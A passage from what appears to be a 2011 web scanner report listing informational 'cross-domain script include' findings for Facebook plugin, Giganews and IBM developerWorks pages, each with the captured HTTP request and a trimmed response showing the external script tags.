Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.169.37
X-Cnection: close
Date: Sat, 17 Sep 2011 01:02:49 GMT
Content-Length: 16940

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="dnaC";</scri
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
...[SNIP]...

18.146. http://www.facebook.com/plugins/facepile.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/facepile.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/facepile.php?action=like&api_key=180186532021462&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df22a9c1b6c%26origin%3Dhttp%253A%252F%252Fwww.bradsdeals.com%252Ff98e336e8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2Fbradsdeals&locale=en_US&login_text=&max_rows=1&sdk=joey&size=small&tense=past&width=200 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.1.38
X-Cnection: close
Date: Sat, 17 Sep 2011 01:38:10 GMT
Content-Length: 7538

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/facepile.php";window._EagleEyeSeed="pNsB";</scri
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
...[SNIP]...

18.147. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?api_key=374095054754&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2147b80ac%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff3524c18b4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=62&id=205702799462197&locale=en_US&sdk=joey&show_faces=false&stream=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM; lsd=JJyyQ

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.8.33
X-Cnection: close
Date: Sat, 17 Sep 2011 00:58:01 GMT
Content-Length: 9196

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
...[SNIP]...

18.148. http://www.giganews.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.giganews.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?gclid=CMbM1MnAoqsCFQNggwod4mqsoA HTTP/1.1
Host: www.giganews.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: location=EUR; paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:15 GMT
Server: Apache/2.0.54 (Fedora)
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Fri, 16 Sep 2011 19:31:15 GMT
Set-Cookie: engine_keywords=google%3Bnntp%20server; domain=.giganews.com; path=/
Vary: Accept-Encoding
Content-Length: 22201

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en">
<head>
<title>U
...[SNIP]...
<meta name="msvalidate.01" content="ED817B8F83430B434BF3FF0CD3ABCB84" />
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

18.149. https://www.giganews.com/signup/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.giganews.com
Path:   /signup/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /signup/ HTTP/1.1
Host: www.giganews.com
Connection: keep-alive
Referer: http://www.giganews.com/?gclid=CMbM1MnAoqsCFQNggwod4mqsoA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: location=EUR; paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; engine_keywords=google%3Bnntp%20server; __utma=176644346.1185559513.1316219532.1316219532.1316219532.1; __utmb=176644346.1.10.1316219532; __utmc=176644346; __utmz=176644346.1316219532.1.1.utmgclid=CMbM1MnAoqsCFQNggwod4mqsoA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=nntp%20server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:32:14 GMT
Server: Apache/2.0.54 (Fedora)
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Fri, 16 Sep 2011 19:32:14 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 21662

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en">
<head>
<title>U
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

18.150. https://www.giganews.com/signup/billing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.giganews.com
Path:   /signup/billing.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /signup/billing.html?si=1&signupkey=1316201533-53313887a-x&edit=1&account=PERS-SILVER-A HTTP/1.1
Host: www.giganews.com
Connection: keep-alive
Referer: https://www.giganews.com/signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: location=EUR; paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; engine_keywords=google%3Bnntp%20server; __utma=176644346.1185559513.1316219532.1316219532.1316219532.1; __utmb=176644346.1.10.1316219532; __utmc=176644346; __utmz=176644346.1316219532.1.1.utmgclid=CMbM1MnAoqsCFQNggwod4mqsoA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=nntp%20server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:37:24 GMT
Server: Apache/2.0.54 (Fedora)
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Fri, 16 Sep 2011 19:37:24 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 43234

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en">
<head>
<title>U
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

18.151. http://www.ibm.com/developerworks/dwtagg/js/dojo/resources/blank.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/dwtagg/js/dojo/resources/blank.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /developerworks/dwtagg/js/dojo/resources/blank.gif HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/forums/thread.jspa?messageID=14644760
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:56:12 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Length: 14815
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head><meta htt
...[SNIP]...
<link href="//dw1.s81c.com/developerworks/css/dw-mf/dw-mf-slim.css" rel="stylesheet" title="www" type="text/css"/>


<script src="//dw1.s81c.com/common/js/ibmcommon.js" type="text/javascript">//</script>

<script src="//dw1.s81c.com/common/js/dynamicnav.js" type="text/javascript">//</script>
...[SNIP]...

18.152. http://www.ibm.com/developerworks/forums/thread.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/forums/thread.jspa

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /developerworks/forums/thread.jspa?messageID=14644760 HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search
Cookie: JSESSIONID=0000mfhqCKD84k-6BQ8KZJG0e-9:119nuofa6; ibmSurvey=1316220781236; pSite=http%3A//www.redbooks.ibm.com/cgi-bin/searchsite.cgi%3Fquery%3Dxss; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:56:00 GMT
Server: IBM_HTTP_Server/6.0.2.43 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 58084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<meta name="IBM.PageAttributes" content="sid=109,100"/>


<script language="JavaScript" src="//dw1.s81c.com/www.ibm.com/developerworks/js/showinterest.js" type="text/javascript">//</script>
...[SNIP]...

18.153. http://www.ibm.com/developerworks/java/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/java/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /developerworks/java/ HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000O2z-Ev76yNpPHLnd4LgjbzQ:13uppre7c; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:56:13 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 57486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<link href="//dw1.s81c.com/developerworks/css/dw-screen-landing.css" media="screen,projection" rel="stylesheet" title="www" type="text/css"/>
<script src="//dw1.s81c.com/common/js/ibmcommon.js" type="text/javascript">//</script>
<script src="//dw1.s81c.com/common/js/dynamicnav.js" type="text/javascript">//</script>
...[SNIP]...
<!-- Dynamic tabs script -->
<script type="text/javascript" src="//dw1.s81c.com/common/js/dyntabs.js" >//</script>
...[SNIP]...
<div id="ibm-metrics">
<script src="//dw1.s81c.com/common/stats/stats.js" type="text/javascript">//</script>
...[SNIP]...
<!-- xM Masthead/Footer -->
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/jquery.tools.min.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/jquery.jscroll.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/dw_v16.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/flash-detect.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/dwsi.js">//</script>
...[SNIP]...
<!-- Overlay js -->
<script language="JavaScript" src="//dw1.s81c.com/common/js/overlay.js" type="text/javascript"></script>
<!-- My dW Interest article -->
<script language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/showinterest.js" type="text/javascript">//</script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/portal/js/aculo/prototypelt.js"></script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/portal/js/dwspace/gadgetpopup.min.js"></script>
...[SNIP]...

18.154. http://www.ibm.com/developerworks/java/find/standards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/java/find/standards/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /developerworks/java/find/standards/ HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/java/
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000O2z-Ev76yNpPHLnd4LgjbzQ:13uppre7c; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:56:47 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 100994


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta
...[SNIP]...
<!-- xM Masthead/Footer -->
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/jquery.tools.min.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/jquery.jscroll.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/dw_v16.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/flash-detect.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/dwsi.js">//</script>
...[SNIP]...

18.155. http://www.ibm.com/developerworks/niagara/jsp/AuthValid.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/niagara/jsp/AuthValid.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /developerworks/niagara/jsp/AuthValid.jsp?rn=0.3916404276875721 HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.ibm.com/developerworks/forums/thread.jspa?messageID=14644760
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:56:10 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Length: 14815
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head><meta htt
...[SNIP]...
<link href="//dw1.s81c.com/developerworks/css/dw-mf/dw-mf-slim.css" rel="stylesheet" title="www" type="text/css"/>


<script src="//dw1.s81c.com/common/js/ibmcommon.js" type="text/javascript">//</script>

<script src="//dw1.s81c.com/common/js/dynamicnav.js" type="text/javascript">//</script>
...[SNIP]...

18.156. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/rational/library/08/0325_segal/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /developerworks/rational/library/08/0325_segal/index.html HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.redbooks.ibm.com/cgi-bin/searchsite.cgi%3Fquery%3Dxss; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:56 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 90352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<link href="//dw1.s81c.com/developerworks/css/dw-mf/dw-mf0311.css" rel="stylesheet" title="www" type="text/css"/>
<script src="//dw1.s81c.com/common/js/ibmcommon.js" type="text/javascript">//</script>
<script src="//dw1.s81c.com/common/js/dynamicnav.js" type="text/javascript">//</script>

<!-- dW functional JS -->
<script language="JavaScript" src="//dw1.s81c.com/developerworks/js/urltactic.js" type="text/javascript"></script>
<!-- Rating_START -->
<script language="JavaScript" src="//dw1.s81c.com/developerworks/js/artrating/showrating.js" type="text/javascript"></script>
...[SNIP]...
<!-- RESERVED_HEADER_INCLUDE -->
<script language="javascript" src="//dw1.s81c.com/developerworks/js/ajax1.js" type="text/javascript"></script>
<script language="javascript" src="//dw1.s81c.com/developerworks/js/search_counter-maverick.js" type="text/javascript"></script>
<script language="javascript" src="//dw1.s81c.com/developerworks/js/request_referer_capture-maverick.js" type="text/javascript"></script>
...[SNIP]...
<!-- JQuery start -->
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/jquery/cluetip98/jquery.hoverIntent.minified.js"></script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/jquery/cluetip98/jquery.cluetip.js"></script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/jquery/tagging/ui.core-1.7.1.js"></script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/jquery/tagging/ui.slider-1.7.1.js"></script>
<!-- xM Masthead/Footer -->
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/jquery.tools.min.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/jquery.jscroll.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/dw_v16.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/flash-detect.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/dwsi.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/dwjquerytags.js"></script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/showcomments.js">//</script>
...[SNIP]...
<!-- Overlay js -->
<script language="JavaScript" src="//dw1.s81c.com/common/js/overlay.js" type="text/javascript"></script>
<!-- My dW Interest article -->
<script language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/showinterest.js" type="text/javascript">//</script>
...[SNIP]...
<div id="ibm-metrics">
<script src="//dw1.s81c.com/common/stats/stats.js" type="text/javascript">//</script>
...[SNIP]...

18.157. http://www.ibm.com/developerworks/tivoli/library/s-csscript/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/tivoli/library/s-csscript/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /developerworks/tivoli/library/s-csscript/ HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
